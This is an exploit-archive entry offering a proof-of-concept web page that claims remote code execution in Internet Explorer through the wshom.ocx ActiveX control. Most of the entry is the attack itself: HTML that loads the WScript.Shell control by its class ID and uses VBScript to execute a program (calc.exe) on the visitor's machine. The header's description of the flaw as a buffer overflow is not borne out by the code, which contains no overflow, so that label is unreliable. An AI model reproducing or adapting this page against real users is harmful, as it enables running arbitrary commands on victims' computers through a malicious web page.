MS Internet Explorer wshom.ocx ActiveX Control Remote Code Execution

2010-01-16T00:00:00
ID 1337DAY-ID-10099
Type zdt
Reporter germaya_x
Modified 2010-01-16T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ==================================================
IE wshom.ocx ActiveX Control Remote Code Execution
==================================================

#######################################################################
#IE ActiveX remote bof (remote code excution)
#version: all versions
#tested on : windows 7 , windows vista ,windows xp sp2
#######################################################################
<html>
<p align="left"><b><font face="Segoe Script" size="7">&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;
&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;&nbps;
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
<script language='vbscript'>
 
arg1="c:\WINDOWS\system32\calc.exe"
 
target.Exec arg1
 
</script></p>



#  0day.today [2018-01-09]  #